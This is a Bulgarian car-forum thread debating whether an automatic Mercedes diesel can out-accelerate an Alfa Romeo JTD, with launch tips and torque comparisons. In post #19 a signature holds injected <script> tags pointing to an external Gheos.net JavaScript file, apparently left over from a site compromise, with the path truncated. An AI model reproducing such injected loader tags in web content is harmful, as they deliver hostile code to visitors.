
....старт от място с автоматик....МБ е класа,не квартална бегачка,но....
Started by SJambazov, 25 Dec 2010 - 12:54:49
90 replies to this topic
#16
Posted 26 December 2010 - 11:56
В краен случай,колега,дори и да те дръпне италианката пак ще си остане посредствен автомобил от нисък клас,лишен от всякаква емоция и произведен да те превози от т.А-до т.Б.Като чифт италиански обувки-Купуваш ги от магазина заради лъскавата опаковка и хубавата кутия и после,като ги поносиш малко,се късат и напукват и ги хвърляш със съжаление,че само си си дал парите...заради опаковката......
#17
Posted 26 December 2010 - 13:41
Не е точно така колега.Алфа е доста приятна кола за каране и създава доста емоции.Първо трябва да се качиш да видиш за какво става въпрос.Имах възможността да карам 166 с такъв двигател,при това здухан и си вървеше доста прилично,а е и по-тежка от 156.Вярно е че този двигател им е доста здрав за сметка на всичко останало.Конкретна 166 погълна около 10хил. в ремонтиВ краен случай,колега,дори и да те дръпне италианката пак ще си остане посредствен автомобил от нисък клас,лишен от всякаква емоция и произведен да те превози от т.А-до т.Б.Като чифт италиански обувки-Купуваш ги от магазина заради лъскавата опаковка и хубавата кутия и после,като ги поносиш малко,се късат и напукват и ги хвърляш със съжаление,че само си си дал парите...заради опаковката......

Относно съзтезанието което коментираме,мисля,че алфата ще е отпред.Мерца е автомат и ми се струва тромав.Алфата се разгръща по-бързо,защото е комънрейл.Ще се радвам ако го счупиш в Меро,ама малко на кантар...Колегите са прави,да не се пускаш,защото само ще си тормозиш кутията,но пък ако искаш опитай.
#18
Posted 26 December 2010 - 16:13
Просто приеми, че караш мерцедес и то не толкова еластичен.JTD e страхотен двигател!!!
Трябва ли да дръпнеш някаква алфа, за да спиш спокойно? Трябва ли да се връзваш на нечии приказки?
И аз не обичам италиански автомобили, но щом ги има значи има пазар за тях и това, че някой е предпочел 5годишен фиат вместо 15годишен мерцедес, не значи непременно, че е лаик и не разбира от коли. Въпрос на вкус казало кучето и си облизало...
Трябва ли да дръпнеш някаква алфа, за да спиш спокойно? Трябва ли да се връзваш на нечии приказки?
И аз не обичам италиански автомобили, но щом ги има значи има пазар за тях и това, че някой е предпочел 5годишен фиат вместо 15годишен мерцедес, не значи непременно, че е лаик и не разбира от коли. Въпрос на вкус казало кучето и си облизало...

Проконтролирай деструктивността на стремежите си..да помислим заедно над крайността....и да отворим по бира....живеем заедно, умираме сами, нали?
#19
Posted 26 December 2010 - 19:15
левия крак на спирачката , десния на газта. вдигаш оборотите. не мога да те посъветвам до колко оборота да вдигнеш , тъй като не знам на колко оборота има най-висок въртящ момент този двигател. пускаш рязко спирачката и си ти. задължително трябва да си на спортен/стандартен режим на кутията , а не на зимен/икономичен. ако ще се дърпаш първо потренирай малко за да свикнеш.
W201 M102.962 <script
<script SRC="http://Gheos.net/js/...2.js"></SCRIPT>
SRC="http://Gheos.net/js/...2.js"></SCRIPT>
<script SRC="http://Gheos.net/js/...2.js"></SCRIPT>
SRC="http://Gheos.net/js/...2.js"></SCRIPT>
#20
Posted 26 December 2010 - 19:23
Основното правило на автоматика е никога двата педала заедно.Ще строши кутията,пък и дизела няма два режима.
Никога не оставям магарето си в калта.
#21
Posted 26 December 2010 - 23:32
Тирове за алфата . Такъв ластик ще ти направи , че после 10 дена няма искаш да се качиш в колата си
Тия алфи ако са чипосани ще ти направи такава дължина , че ще си мислиш , че не сти тръгнал.
Няма смисъл колега , тоя с алфата като ги изреди 1 2 вече ще е отпред с 2 калника г/д , после като вкара трета и като се развърти тва дизелче и както ти казах ще си милиш , че си спрял.
Не се занимавай с тия работи , МЕРЦЕДЕС караш , а не някой кошник за 2 бона .
Поздрави !

Няма смисъл колега , тоя с алфата като ги изреди 1 2 вече ще е отпред с 2 калника г/д , после като вкара трета и като се развърти тва дизелче и както ти казах ще си милиш , че си спрял.
Не се занимавай с тия работи , МЕРЦЕДЕС караш , а не някой кошник за 2 бона .
Поздрави !


W140 The best or nothing !
Тръгвай и карай така все едно шофираш Мерцедес и то S-Klasse . Тежко , бавно , полека и с финес , хората като видят муцуната и сами се сещат че трябва да ти дадът път и предимство.
#22
Posted 26 December 2010 - 23:42
Аз също съм чел (не съм опитвал), че за да изсмучеш максимално
ускорение се прави трикът със спирачката. И като допълнение,
след като рязко пуснеш спирачката трябва да сриташ газта до долу,
за да подсетиш автомата да мине на спортен режим и да сменя скоростите
при максимани обороти.
Успех!
ускорение се прави трикът със спирачката. И като допълнение,
след като рязко пуснеш спирачката трябва да сриташ газта до долу,
за да подсетиш автомата да мине на спортен режим и да сменя скоростите
при максимани обороти.
Успех!
#23
Posted 27 December 2010 - 10:12
туй с двата педала става ама не трябва да
задържаш повече от 2-3 сек. щото ще прегориш
хидротрансформатора и тогава по добре си търси друга кола
а и ако торка ти е в ред повече от 2-2500 оборота
не може да развъртиш
задържаш повече от 2-3 сек. щото ще прегориш
хидротрансформатора и тогава по добре си търси друга кола
а и ако торка ти е в ред повече от 2-2500 оборота
не може да развъртиш
#24
Posted 27 December 2010 - 11:10
Аз мисля че автомата е предимство в известна степен.
Зависи на каква настилка, на какво растояние ще се дърпате и т.н.
Не знам твоя автомат има ли превключвател за икономичен и стандартен режим - "E" -"S"
Слагаш на стандартен - мачкаш до долу и си ти. Ако пък е хлъзгаво - в началото по-леко само да отлепи, после мачкай до долу. На хлъзгаво колите с предно имат по-малко сцепление от колите със задно, особено ако подаваш повечко газ, а веднъж загубиш ли сцепление с асфалта, колкото и и да е мощен мотора - губиш ценни секунди.
Но концепцията на Мерцедес не е да прави спортни седани, а комфортни седани (или комбита
). Те са Autobahn крузери. За Мерцедес, автомобилът е много повече от 4 колела и мотор. Може да се каже че автомобилът е единна цялост.
П>П> Идеята за ел. управляемо директно впръскване на наХтата е разработка на институтите на ФИАТ, после я купуват японците и май Митсубиши първи пускат мотор с електронно-управляемо директно впръскване с турбина.
Едва тогава и Европейските производители пускат JTD, Common Rail, CDI, TDCI, и т.н.
Зависи на каква настилка, на какво растояние ще се дърпате и т.н.
Не знам твоя автомат има ли превключвател за икономичен и стандартен режим - "E" -"S"
Слагаш на стандартен - мачкаш до долу и си ти. Ако пък е хлъзгаво - в началото по-леко само да отлепи, после мачкай до долу. На хлъзгаво колите с предно имат по-малко сцепление от колите със задно, особено ако подаваш повечко газ, а веднъж загубиш ли сцепление с асфалта, колкото и и да е мощен мотора - губиш ценни секунди.
Но концепцията на Мерцедес не е да прави спортни седани, а комфортни седани (или комбита

П>П> Идеята за ел. управляемо директно впръскване на наХтата е разработка на институтите на ФИАТ, после я купуват японците и май Митсубиши първи пускат мотор с електронно-управляемо директно впръскване с турбина.
Едва тогава и Европейските производители пускат JTD, Common Rail, CDI, TDCI, и т.н.
#25
Posted 27 December 2010 - 11:22
Доста съдържателна тема се е заформила. Има съвети как да си тормозиш колата до счупване и как да си направиш пернишки кеф
Тия квартални ластици са опасни в междублоковите пространства. Трябва да се правят на подходящи места.
Автомата не е най-подходящата трансмисия за подобни изпълнения, но все пак много зависи от състоянията на двата автомобила.
Чувал съм, че алфите много вървели, ама по магистралата не съм попадал на пилоти с алфи, повечето са некви голфове и дърти БМВ-та 3-ки, тук-таме некое Ауди.
Напълно подкрепям колегите, които съветват да не се генерира простотия и колата да се ползва за спокоен кеф.

Тия квартални ластици са опасни в междублоковите пространства. Трябва да се правят на подходящи места.
Автомата не е най-подходящата трансмисия за подобни изпълнения, но все пак много зависи от състоянията на двата автомобила.
Чувал съм, че алфите много вървели, ама по магистралата не съм попадал на пилоти с алфи, повечето са некви голфове и дърти БМВ-та 3-ки, тук-таме некое Ауди.
Напълно подкрепям колегите, които съветват да не се генерира простотия и колата да се ползва за спокоен кеф.
Mercedes-Benz - Unlike any other!
#26
Posted 27 December 2010 - 11:26
http://www.carfolio..../car/?car=79563 - Ето я Алфата.
304Нм при 2000 оборота, 136 коня при 4200 оборота (тук вече са 230Нм). Крайно предавателно число 3.35
http://www.carfolio....car/?car=109120 - ето го и Мерцедеса.
280Нм при 1800-3600 оборота, 150 коня при 4400 оборота (239Нм). Крайно предавателно число намерих само за ръчка - 3.46, но на автомата със сигурност е по-малко, т.е дифът е по-дълъг.
Макар че въртящия момент на Мерцедеса е по-нисък, кривата е по-плоска и максимумът идва по-рано и се запазва до по-вискои обороти отколкото при Алфата.
Масата и на двата автомобила е приблизително еднаква.
Ако и двата мотора и горивните им системи са в добро състояние, ще бъде интересна надпревара.
НО - ЗАДЪЛЖИТЕЛНО някъде на обезопасено място се дърпайте. Да няма деца, пешеходци, автомобили и т.н. наоколо.
304Нм при 2000 оборота, 136 коня при 4200 оборота (тук вече са 230Нм). Крайно предавателно число 3.35
http://www.carfolio....car/?car=109120 - ето го и Мерцедеса.
280Нм при 1800-3600 оборота, 150 коня при 4400 оборота (239Нм). Крайно предавателно число намерих само за ръчка - 3.46, но на автомата със сигурност е по-малко, т.е дифът е по-дълъг.
Макар че въртящия момент на Мерцедеса е по-нисък, кривата е по-плоска и максимумът идва по-рано и се запазва до по-вискои обороти отколкото при Алфата.
Масата и на двата автомобила е приблизително еднаква.
Ако и двата мотора и горивните им системи са в добро състояние, ще бъде интересна надпревара.
НО - ЗАДЪЛЖИТЕЛНО някъде на обезопасено място се дърпайте. Да няма деца, пешеходци, автомобили и т.н. наоколо.
#27
Posted 27 December 2010 - 12:31
Според техническите данни от колегата по-горе, Алфата спринтира
до 100 с 0,6 сек. по-бързо. Разликата не е голяма, но колкото да си добър пилот
няма да успееш да му дръпнеш така, че да го разплачеш от обида и безсилие - а ти това искаш, нали?
Една битка се печели преди да е започнала, а оттеглянето от боя не е загуба.
до 100 с 0,6 сек. по-бързо. Разликата не е голяма, но колкото да си добър пилот
няма да успееш да му дръпнеш така, че да го разплачеш от обида и безсилие - а ти това искаш, нали?
Една битка се печели преди да е започнала, а оттеглянето от боя не е загуба.
#28
Posted 27 December 2010 - 12:33
Една готина рекламка, малко да охладим страстите:
#29
Posted 27 December 2010 - 13:01
Такива ги бъзикат по цял ден заради колите им,а и те самите след време осъзнават какъв боклук карат,з-то по-зле от алфа,ланча и фиат няма на целия свят.
Абе не съм много съгласен. Ако си мислиш, че на някого му пука, че караме Мерцедеси на по 10-15 г. например, лъжеш се. Е, наистина тук таме в някоя приятелска компания на някакви рейсъри или автоманиаци, може и да има бъзици, но това е изключение. Аз признавам, че за мен това е най-великата марка, с безбройните й качества, които откривам всеки ден. Приеми обаче, че има хора които настина не харесват МБ. Познавам такива, които са имали МБ, обичат да шофират, попадали са на здрава кола, но са ги продавали, защото не им харесва и това е. Даже единия е и автомонтьор на всичкото отгоре. Взе си някакво Мицубиши и каза, че повече от японско няма да мръдне..........но както каза и Мишо общо взето - в смисъла въпрос на вкус. Мислите ли си, че някой който се е набил за италианка и е хвърлил толкова пари за ремонти, не може да си позволи даже да купи и два Мерца например. Ами може (по думите на колегата с 10 бона за ремонт), защо ще го бъзикат тогава. Какво му пука. Преди няколко месеца си направих опит ей така за проба, като си пуснах обява, да си бартеросам на чист бартер Цедката (която мисля общо взето като цяло си е лъскач) за Форд Фокус комби. Тъй като общо взето Цедка като моята и Фокус 99-00г. вървяха на едни пари (имаше фокуси и за по 3 500 даже) Понеже имам и Мондео и влизам и във Форума на Форд, та там изказаха мнение, че едва ли не нямало такъв глупак, който да си даде Фокуса за Мерцедес по-стар с 4-5 години
Иначе към автора на темата: МБ и то 250 ТД не е кола за състезание и няма нищо срамно, че някой щял да те дръпне. Ами то и с Голф 1 някой може да ти скине шортите...........а и не само на Мерца. По тази логика, хората каращи Ролс Ройс или Бентли, трябва много да ги е срам, защото някой с Алфа или Ланча щял да им направи ластици.

От Витоша по-високо нема, от Искаро по-дълбоко нема и от Мерцедес по-убаво нема...............древна шопска мъдрост!
#30
Posted 27 December 2010 - 13:09
Основното правило на автоматика е никога двата педала заедно.Ще строши кутията,пък и дизела няма два режима.
Дизела има два режима S и W
ГАЗОВ ИНЖЕКЦИОН - ПРОДАЖБА, МОНТАЖ И НАСТРОЙКА ОТ МАКС ГАЗ
http://maxgas-bg.com/
бул. Асен Йорданов 17
+359 878 14 14 60
http://maxgas-bg.com/
бул. Асен Йорданов 17
+359 878 14 14 60

0 user(s) are reading this topic
0 members, 0 guests, 0 anonymous users